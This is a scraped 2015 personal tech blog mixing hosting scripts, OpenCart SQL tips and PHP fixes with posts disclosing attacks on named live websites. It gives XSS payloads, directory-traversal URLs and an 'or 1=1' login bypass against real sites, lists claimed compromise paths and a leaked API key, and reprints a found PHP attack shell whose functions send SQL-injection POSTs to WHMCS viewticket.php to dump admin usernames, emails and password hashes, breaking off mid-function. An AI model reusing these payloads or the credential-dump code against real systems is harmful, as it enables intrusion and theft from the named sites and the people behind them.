   Set rsService = oService.SearchEx(, rsServiceSet("ServiceSetId"))

   WScript.Echo "[!] Processing Domain: " & UCase(DomainName)

   WScript.Echo "  [-] Removing... Removing all DNS A records!"
   ActionResult = oDNS.RemoveARecordEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [-] Removing... Removing all DNS MX records!"
   ActionResult = oDNS.RemoveMXRecordEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [-] Removing... Removing all DNS CNAME records!"
   ActionResult = oDNS.RemoveCNAMERecordEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [-] Removing... Removing all DNS ID records from Helm!"
   If Not rsDNS.EOF Then rsDNS.MoveFirst
   Do While Not rsDNS.EOF
      DNSRecordID = rsDNS("DNSRecordID")
    
      If DNSRecordID <> "" Then
         WScript.Echo "    [-] Removing...  DNS ID: " & DNSRecordID & "!"
         ActionResult = oDNS.RemoveRecord("ADMIN", AdminPass, DNSRecordID)
         If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
         End If
      End If
      rsDNS.MoveNext
   Loop

   WScript.Echo "  [-] Removing... Removing the domain ZONE completely!"
   ActionResult = oDNS.RemoveDomainEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [+] Adding...   Readding the domain zone!"
   ActionResult = oDNS.CreateDomainEx(DomainID)

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [>] Adding...   Readding standard DNS records!"

   WScript.Echo "    [+] Adding...    DNS A Record: @!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "@", oWebsite.GetWebSiteIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: *!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "*", oWebsite.GetWebSiteIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: WWW!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "www", oWebsite.GetWebSiteIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: FTP!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "ftp", oFTP.GetFTPIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS A Record: MAIL!"
   ActionResult = oDNS.CreateARecordEx(DomainID, "mail", oEmail.GetMailIPEx(DomainID))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "    [+] Adding...    DNS MX Record: MAIL! [" & rsService("ServicePriority") & "]"
   ActionResult = oDNS.CreateMXRecordEx(DomainID, "mail." & LCase(DomainName), rsService("ServicePriority"))

   If ActionResult <> "" Then
      WScript.Echo "  [E] " & ActionResult
      WScript.Echo ""
      ActionResult = ""
   End If

   WScript.Echo "  [>] Fixing...   Removing and adding existing domain alias's!"

   If Not rsDomainAlias.EOF Then rsDomainAlias.MoveFirst
   Do While Not rsDomainAlias.EOF
      DomainAliasID = rsDomainAlias("DomainAliasID")
      AliasName = rsDomainAlias("AliasName")
    
      If AliasName <> "" Then
         WScript.Echo "    [-] Removing...  Alias: " & UCase(AliasName) & "!"
         ActionResult = oDomainAlias.DeleteEx(DomainAliasID)
         If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
         End If

         WScript.Echo "    [+] Adding...    Alias: " & UCase(AliasName) & "! New ID: " & oDomainAlias.AddEx(DomainID, AliasName)
      End If
      rsDomainAlias.MoveNext
   Loop

   WScript.Echo "  [>] Adding...   Global DNS Records from reseller: " & ResellerAccountNumber & "!"

   If Not rsGlobalDNS.EOF Then rsGlobalDNS.MoveFirst
   Do While Not rsGlobalDNS.EOF
      Select Case rsGlobalDNS("RecordType")
         Case DNS_A
          WScript.Echo "    [+] Adding...    DNS A Record: " & UCase(rsGlobalDNS("RecordName")) & "!"
          ActionResult = oDNS.CreateARecordEx(DomainID, rsGlobalDNS("RecordName"), Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_MX
          WScript.Echo "    [+] Adding...    DNS MX Record: " & UCase(rsGlobalDNS("RecordData")) & "!"
          ActionResult = oDNS.CreateMXRecordEx(DomainID, Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName), rsGlobalDNS("RecordPreference"))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_CNAME
          WScript.Echo "    [+] Adding...    DNS CNAME Record: " & UCase(rsGlobalDNS("RecordName")) & "!"
          ActionResult = oDNS.CreateCNAMERecordEx(DomainID, rsGlobalDNS("RecordName"), Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_TXT
          WScript.Echo "    [+] Adding...    DNS TXT Record: " & UCase(rsGlobalDNS("RecordName")) & "!"
          ActionResult = oDNS.CreateTXTRecordEx(DomainID, rsGlobalDNS("RecordName"), Replace(rsGlobalDNS("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
     End Select
      rsGlobalDNS.MoveNext
   Loop

   WScript.Echo "  [>] Adding...   Global DNS Records from the ADMIN account!"

   If Not rsGlobalDNSAdmin.EOF Then rsGlobalDNSAdmin.MoveFirst
   Do While Not rsGlobalDNSAdmin.EOF
      Select Case rsGlobalDNSAdmin("RecordType")
         Case DNS_A
          WScript.Echo "    [+] Adding...    DNS A Record: " & UCase(rsGlobalDNSAdmin("RecordName")) & "!"
          ActionResult = oDNS.CreateARecordEx(DomainID, rsGlobalDNSAdmin("RecordName"), Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_MX
          WScript.Echo "    [+] Adding...    DNS MX Record: " & UCase(rsGlobalDNSAdmin("RecordData")) & "!"
          ActionResult = oDNS.CreateMXRecordEx(DomainID, Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName), rsGlobalDNSAdmin("RecordPreference"))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_CNAME
          WScript.Echo "    [+] Adding...    DNS CNAME Record: " & UCase(rsGlobalDNSAdmin("RecordName")) & "!"
          ActionResult = oDNS.CreateCNAMERecordEx(DomainID, rsGlobalDNSAdmin("RecordName"), Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
       Case DNS_TXT
          WScript.Echo "    [+] Adding...    DNS TXT Record: " & UCase(rsGlobalDNSAdmin("RecordName")) & "!"
          ActionResult = oDNS.CreateTXTRecordEx(DomainID, rsGlobalDNSAdmin("RecordName"), Replace(rsGlobalDNSAdmin("RecordData"), "[DomainName]", DomainName))
          If ActionResult <> "" Then
            WScript.Echo "    [E] " & ActionResult
            WScript.Echo ""
            ActionResult = ""
          End If
     End Select
      rsGlobalDNSAdmin.MoveNext
   Loop

   WScript.Echo ""
   rsDomain.MoveNext
Loop
WScript.Echo "Total Domains Processed: " & iCount

Set rsDomain = Nothing
Set rsGlobalDNS = Nothing
Set rsGlobalDNSAdmin = Nothing
Set rsDomainAlias = Nothing
Set rsDNS = Nothing
Set rsServiceSet = Nothing
Set rsService = Nothing

Set oDomain = Nothing
Set oDNS = Nothing
Set oFTP = Nothing
Set oEmail = Nothing
Set oWebsite = Nothing
Set oService = Nothing
Set oServiceSet = Nothing
Set oDomainAlias = Nothing
Set oGlobalDNSRecord = Nothing

Friday, 25 September 2015

How to insert an opencart category with SQL only

I've always set the default store (0).


SET @catname = 'MyCategory';

INSERT INTO `test`.`oc_category` (`category_id`, `image`, `parent_id`, `top`, `column`, `sort_order`, `status`, `date_added`, `date_modified`) VALUES (NULL, '', '0', '0', '1', '0', '1', '2015-09-02 00:00:00', '2015-09-02 00:00:00');
SET @lastinsert = LAST_INSERT_ID();


/* Two inserts: language id 1 (English) and language id 2 (Italian), in my case */
INSERT INTO `test`.`oc_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES (@lastinsert, '1', @catname, @catname, @catname, @catname, @catname);
INSERT INTO `test`.`oc_category_description` (`category_id`, `language_id`, `name`, `description`, `meta_title`, `meta_description`, `meta_keyword`) VALUES (@lastinsert, '2', @catname, @catname, @catname, @catname, @catname);

INSERT INTO `test`.`oc_category_to_store` (`category_id`,`store_id`) VALUES( @lastinsert, '0');
INSERT INTO `oc_url_alias` (`query`, `keyword`) VALUES (CONCAT('category_id=', @lastinsert ), @catname);
INSERT INTO `oc_category_path` (`category_id`, `path_id`, `level`) VALUES (@lastinsert, @lastinsert, '0') ;

Tuesday, 22 September 2015

http://www.foliopages.com/php-photo-gallery-no-database XSS, file information leakage, directory traversal

http://www.foliopages.com/php-photo-gallery-no-database


Sample XSS
http://www.foliopages.com/demos/folio-gallery/demo.php?album=Big+Bear+California</title><script>alert('http://trueliarx.blogspot.com');</script>

(with multiple pages)

http://www.foliopages.com/demos/folio-gallery/demo.php?album=Big+Bear+California&p=<script>alert('http://trueliarx.blogspot.com');</script>


http://localhost/demo.php?album=frankenstein%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C


Errors

Warning: scandir(albums/Big Bear California</title><script>alert('http://trueliarx.blogspot.com');</script>): failed to open dir: No such file or directory in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 162

Warning: scandir(): (errno 2): No such file or directory in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 162

Warning: Invalid argument supplied for foreach() in /home/foliopag/public_html/demos/folio-gallery/folio-gallery.php on line 165
There are no photos in this album!

view other folder names
http://www.foliopages.com/demos/folio-gallery/demo.php?album=../../../../../../../../../../../../../../../home/foliopag/public_html/dancer
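
How a gallery script can handle the album and p parameters so that the reflected markup, the scandir() warnings and the ../ traversal shown above cannot occur. This is an added example, not folio-gallery's own code: the function names, the 12-per-page value and the temporary albums directory are assumptions, and the demo requests reuse the values from this post.

```php
<?php
declare(strict_types=1);

// Escape a value before it is written into HTML text or an attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Map the requested album name to a directory directly under $albumsRoot.
// Returns the resolved path, or null when the name is not an existing album.
function resolve_album(string $albumsRoot, string $requested): ?string
{
    $root = realpath($albumsRoot);
    if ($root === false || !is_dir($root)) {
        return null;
    }
    $entries = scandir($root);
    if ($entries === false) {
        return null;
    }
    // Allow-list: the name must equal one real directory entry, so values
    // containing "/" or ".." or markup can never match.
    if (!in_array($requested, array_diff($entries, ['.', '..']), true)) {
        return null;
    }
    // Second check: after resolving symlinks the path must still be inside the root.
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($path === false || !is_dir($path) || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Accept only an integer page number within 1..$maxPage; anything else becomes 1.
function page_number($raw, int $maxPage): int
{
    $page = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => max(1, $maxPage)],
    ]);
    return $page === false ? 1 : $page;
}

// Build the response. The first line stands in for the HTTP status code.
function render_gallery(string $albumsRoot, array $query): string
{
    $name = $query['album'] ?? '';
    $path = is_string($name) ? resolve_album($albumsRoot, $name) : null;
    if ($path === null) {
        // Fixed message: the request value is never echoed and scandir() is
        // never called on it, so no warning with the server path is produced.
        return "404\n<title>Gallery</title>\n<p>Album not found.</p>";
    }
    $photos = array_filter(
        scandir($path) ?: [],
        fn($f) => preg_match('~\.(jpe?g|png|gif)$~i', $f) === 1
    );
    $perPage = 12; // assumed page size
    $page = page_number($query['p'] ?? 1, (int) ceil(count($photos) / $perPage));
    // Even a valid album name is escaped on output.
    return "200\n<title>" . h($name) . "</title>\n<p>Page $page, " . count($photos) . " photo(s)</p>";
}

// Constructed demo data: a temporary albums directory with one album.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'albums_' . bin2hex(random_bytes(4));
$album = $root . DIRECTORY_SEPARATOR . 'Big Bear California';
mkdir($album, 0700, true);
touch($album . DIRECTORY_SEPARATOR . 'lake.jpg');

$requests = [
    ['album' => 'Big Bear California', 'p' => '1'],
    ['album' => "Big Bear California</title><script>alert(1);</script>"],
    ['album' => 'Big Bear California', 'p' => '<script>alert(1);</script>'],
    ['album' => '../../../../home/foliopag/public_html/dancer'],
];
foreach ($requests as $query) {
    echo render_gallery($root, $query), "\n---\n";
}

// Remove the demo directory again.
unlink($album . DIRECTORY_SEPARATOR . 'lake.jpg');
rmdir($album);
rmdir($root);
```

Only the first and third requests reach the album, and the third falls back to page 1; the other two get the fixed 404 body.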

How to get the file extension with PHP.

An easy way to get the extension of a file  with php.

$src = 'myname.jpg';

$arr = explode('.',$src);
$extension = $arr[count($arr)-1];

echo $extension;


The result will be 'jpg'.

Sunday, 20 September 2015

Opencart - css - set image thumbnail preview rectangle border to fit the image (ex. square)


Add in your stylesheet.css


/*fix centering the product thumbnails and resizing to square*/
.thumbnail {
display: inline-block;

}
.thumbnails li {
    text-align: center;
}
/*end of fix*/

https://www.myfonts.com/ | raising errors - no tests

https://www.myfonts.com/
Error raised by using a specific image that doesn't fit any kind of character. Submit without any value to get the error. That's all.











( ! ) Warning: implode(): Invalid arguments passed in /home/serve_me/www/trunk/include/WhatTheFont/Utils.php on line 24
Call Stack
# | Time | Memory | Function | Location
1 | 0.0000 | 246064 | {main}( ) | .../rewrite.php:0
2 | 0.0246 | 1993640 | require( '/home/serve_me/www/trunk/webroot/widgets/wtf/wtf.php' ) | .../rewrite.php:52
3 | 0.0300 | 3346192 | require( '/home/serve_me/www/trunk/webroot/widgets/wtf/results.php' ) | .../wtf.php:19
4 | 0.0484 | 3572104 | WhatTheFont\WhatTheFont->getFontMatches( ) | .../results.php:29
5 | 0.0484 | 3572336 | WhatTheFont\Client->getResult( ) | .../WhatTheFont.php:192
6 | 0.0484 | 3572336 | WhatTheFont\Client->attemptConnection( ) | .../Client.php:227
7 | 0.0500 | 3572872 | WhatTheFont\Client->getMessage( ) | .../Client.php:208
8 | 0.0500 | 3573080 | WhatTheFont\Utils::convertCharacters( ) | .../Client.php:195
9 | 0.0500 | 3573304 | implode ( ) | .../Utils.php:24

( ! ) Warning: implode(): Invalid arguments passed in /home/serve_me/www/trunk/webroot/widgets/wtf/results.php on line 37
Call Stack
# | Time | Memory | Function | Location
1 | 0.0000 | 246064 | {main}( ) | .../rewrite.php:0
2 | 0.0246 | 1993640 | require( '/home/serve_me/www/trunk/webroot/widgets/wtf/wtf.php' ) | .../rewrite.php:52
3 | 0.0300 | 3346192 | require( '/home/serve_me/www/trunk/webroot/widgets/wtf/results.php' ) | .../wtf.php:19
4 | 0.0793 | 3645072 | implode ( ) | .../results.php:37

Wednesday, 16 September 2015

How to show PHP errors in the web browser - the php error reporting

When you need to show all the PHP errors in the browser, just use this code

ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(E_ALL);

It should work with any version of PHP and report almost any kind of PHP error while you are debugging your code.

Remember to disable this in production: displayed errors reveal file paths and function names to every visitor.



Saturday, 12 September 2015

FIX - phpmysql error - #1273 - #1273 - Unknown collation: 'utf8mb4_general_ci' - with sql file only

How to FIX - phpmysql error - #1273 - #1273 - Unknown collation: 'utf8mb4_general_ci'

Why does it happen?

The utf8mb4_unicode_ci collation is supported only on MySQL servers 5.5.3+ and is not available on older servers. That's all.

The worst solution

If you have only an SQL file you can TRY to change

... COLLATE utf8mb4_unicode_ci
to
utf8_general_ci

but it's NOT SAFE because you can run into problems with the encoding!!! I've tested and it also works but really don't know if there can be consequences.


The best solution


Export from the original database in utf8_general_ci or, if you just have the sql, Import your data in a newer mysql server (5.5.3+) and export again with utf8_general_ci!


Another way to do it
If you want to operate on a live database run this sql for each table.

ALTER TABLE name-of-table CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci


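Sample (crappy) php code


<?php
// Convert every table of one database to utf8 / utf8_general_ci.
$dbuser = 'test2';
$dbpassword = 'test2';
$dbhost = 'localhost';
$dbname = 'test2';

$dbconn = mysqli_connect($dbhost, $dbuser, $dbpassword, $dbname);
if (!$dbconn) {
    die('Connection failed: ' . mysqli_connect_error());
}

$mydata = mysqli_query($dbconn, 'SHOW TABLES');
// mysqli_fetch_row() returns each table name once; mysqli_fetch_array() returns it
// under a numeric and an associative key, which ran every ALTER twice.
while ($row = mysqli_fetch_row($mydata)) {
    $mytable = str_replace('`', '``', $row[0]); // quote the identifier safely
    if (!mysqli_query($dbconn, "ALTER TABLE `$mytable` CONVERT TO CHARACTER SET utf8 COLLATE utf8_general_ci")) {
        echo "Failed on $mytable: " . mysqli_error($dbconn) . "\n";
    }
}
mysqli_close($dbconn);
?>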
 
 
and then export your data.




This happened with several cms like wordpress, joomla, magento, opencart, drupal, smf forums, etc.

It's not a problem related to the scripts!

Monday, 7 September 2015

[FIX] An exception occured in driver: could not find driver

Usually the error occurs when the PDO SQLite extension is not enabled, so PDO cannot find the driver.

Go to your php.ini configuration file and uncomment or add

extension=php_pdo_sqlite.dll

make sure that also
extension=php_sqlite3.dll
is enabled.

Restart your web server.

how to use owncloud on windows server

Even if it's not recommended, you can run ownCloud on your local Windows server.

Go to /lib/private/util.php
and comment out or remove the following block near line 581:

/*
        if(OC_Util::runningOnWindows()) {
            $errors[] = [
                'error' => $l->t('Microsoft Windows Platform is not supported'),
                'hint' => $l->t('Running ownCloud Server on the Microsoft Windows platform is not supported. We suggest you ' .
                    'use a Linux server in a virtual machine if you have no option for migrating the server itself. ' .
                    'Find Linux packages as well as easy to deploy virtual machine images on <a href="%s">%s</a>. ' .
                    'For migrating existing installations to Linux you can find some tips and a migration script ' .
                    'in <a href="%s">our documentation</a>.',
                    ['https://owncloud.org/install/', 'owncloud.org/install/', 'https://owncloud.org/?p=8045'])
            ];
        } */



Thursday, 3 September 2015

axioscloud.it | xss, system compromise


There are too many server/sites in this case. Append that string:
<video src=1 onerror=alert('testamento')>

From server
https://re1.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=
to (change the initial RE part with nr) server
https://re35.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=

https://redemo.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=





www.sissiweb.it - the system is already compromised - win

Tuesday, 1 September 2015

ancelleinrete.it | system compromise


path: /var/www/vova/data/www/ancelleinrete.it/

passwd

Saturday, 29 August 2015

Mass move your categories in another store (id) in opencart

 With this simple sql query we are going to add, in an easy and fast way, the categories in another store

INSERT into `oc_category_to_store` (category_id, store_id) SELECT category_id, 0 from oc_category;

Replace the 0 (zero) with the id of the other store(id).

Thursday, 27 August 2015

Problem with facebook business page that cannot be shown on mobile - cannot search facebook page via smartphone

Facebook business page cannot be found on facebook mobile from any kind of mobile device.


You can try:

- to contact the facebook's customer care ... that doesn't reply too often.

- to unpublish (hide) and publish your facebook page. This method works for pages that cannot be reached at all (desktop and mobile).

- Merge eventual duplicate facebook business pages. Maybe the problem is that only one will show in the searches.

- make sure to configure/assign the definitive facebook web address from the page settings.


Those are NOT definitive solutions!



Facebook business page problem: not present on mobile - impossible to search for it from a phone


A Facebook business page is not found in mobile searches and cannot be reached from any phone.


You can try:

- contacting Facebook support ... which doesn't reply often.

- hiding and republishing the page. This method works (worked) for pages that cannot be seen on desktop and mobile.

- merging any duplicate business pages. One is visible and the other is not.

- making sure you have set the Facebook address for the page.


These are not sure solutions, but they are the hypotheses I could come up with when the problem arose!

Wednesday, 26 August 2015

http://www.instat.gov.al | possible Sql injection, data leak, data dump

http://www.instat.gov.al/al/figures/statistical-databases/select.aspx?rxid=1df185c6-c85e-4c8d-b7ae-d400ecedf852&px_tableid=LSMS51

LSMS51 seems to be the table and we can inject sql/data queries.

http://www.akp.gov.al/ | joomla 1.7 with bugs

www.qkr.gov.al | XSS

sample:
www.qkr.gov.al/nrc/SearchPage.aspx?find=search:"><script>alert(1);</script><"&t=3

Thursday, 20 August 2015

http://www.domaindirect.it/ | sql injection, data dump, XSS

http://www.domaindirect.it/cat/tre%20lettere/page=XXX

It's possible to create a sql injection in several parts of the website.

the php website is using Zend


XSS
www.domaindirect.it/search/"><script>alert(1);</script>

http://www.martialart.it | sys compromise, path disclosure, etc

path: /web/htdocs/www.martialart.it/home/firedragon/

 api flickr 5975c197350037e77999ef112ec76cbe

Sunday, 16 August 2015

https://www.msweb2000.ca/ | sql injection at login

admin
a' or 1=1 --'

Wednesday, 12 August 2015

newshell.it | sql injections, system compromise, plesk remote exploit

https://newshell.it/index.php?action=utente&utenteAction=login

Sql injection in the login area

__________________________

https://mac.newshell.it:8443


https://xen1001.newshell.it:8443/
https://www.registrazionedomini.in:8443/
plesk + apache - remote exploit problem

Saturday, 8 August 2015

Best SEO practice to redirect a domain to your own

Use a php page (index.php) with a 301 Moved Permanently

<?php
// 301 Moved Permanently
header("Location: http://www.bnit.it",TRUE,301);
exit; // stop here so nothing else is sent after the redirect

?>

Friday, 7 August 2015

php shell found on a hacked server

andriroot@gmail.com is the email of the attacker. He's known as andri Cyber4rt and is from Jakarta;
he usually uses the same email for fraud and usually abuses old bugs in WHMCS, Plesk and so on.
His alternate email address is andri.cyber4rt@gmail.com.


 if(strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
function printLogin(){
echo "<html><head><title>./DM ExploiterZ [ 0day ]</title>
<style>body {font-family: 'Audiowide',serif;font-size: 20px;} </style></head>
<body bgcolor=black><center><br><br>
<nobr><font face=Audiowide color=blue>ExploiterZ <font color=white>[ 0day ]</font></nobr><br><br>
<form method=post>
<img src='https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-ash3/t1/994064_479867415465112_1199170647_n.jpg'><br><br>
:: Password :: <br><br>
<input size=30 style='color:blue;background-color:#000000' type='password' name='pass'>
<input style='color:blue;background-color:#000000' type=submit value=' Login Cuk '></font></form><br><br>";
exit;
}
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) {
if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) {
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
} else {
printLogin();
}
}
set_time_limit(0);
error_reporting(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'andriroot@gmail.com'; # ganti dengan email kamu

$error[] = 'You have an error in your SQL';
$error[] = 'supplied argument is not a valid MySQL result resource in';
$error[] = 'Division by zero in';
$error[] = 'Call to a member function';
$error[] = 'Microsoft JET Database';
$error[] = 'ODBC Microsoft Access Driver';
$error[] = 'Microsoft OLE DB Provider for SQL Server';
$error[] = 'Unclosed quotation mark';
$error[] = 'Microsoft OLE DB Provider for Oracle';
$error[] = 'Incorrect syntax near';
$error[] = 'SQL query failed';

function cut($start,$end,$top){
$c =strlen($start);
$desc= strstr("$top","$start");
$count = strpos("$desc","$end");
$desc = substr($desc,$c,$count-$c);
return $desc;
}

function tengah($string, $awal, $akhir){
$string = " ".$string;
$strings = strpos($string,$awal);
if ($strings == 0) return "";
$strings += strlen($awal);
$antara = strpos($string,$akhir,$strings) - $strings;
return substr($string,$strings,$antara);
}

function konek($url) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}

function filter($string){
if(get_magic_quotes_gpc() != 0){
return stripslashes($string);
} else {
return $string;
}
}


function letItBy(){
ob_flush();
flush();
}

function getAlexa($url){
$xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
$rank1 = $xml->SD[1];
if($rank1)
$rank = $rank1->POPULARITY->attributes()->TEXT;
else
$rank = 0;
return $rank;
}


function google($query, $page=1){
$resultPerPage=8;
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=en&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
$resultFromGoogle = json_decode( http_get($url, true) ,true);
if(isset($resultFromGoogle['responseStatus'])) {
if($resultFromGoogle['responseStatus'] != '200') return false;
if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
else return $resultFromGoogle['responseData']['results'];
}
else
die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
}

function http_get($url, $safemode = false){
if($safemode === true) sleep(1);
$im = curl_init($url);
curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($im, CURLOPT_HEADER, 0);
return curl_exec($im);
curl_close();
}

function hajar($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack1($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,roleid,0x3a,username,0x3a,email,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}

function hack2($url) {
$url = dirname($url) . '/viewticket.php';
$url = str_replace("/admin","",$url);
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,password,0x3a3a3a3a3a) FROM tbladmins ORDER BY id ASC),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($url);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[0]) {
return $infoz[0];
}
else
return "Fail!";
}
else
return "Fail!";
}


function dm($url,$injection){
$url = dirname($url) . '/viewticket.php';
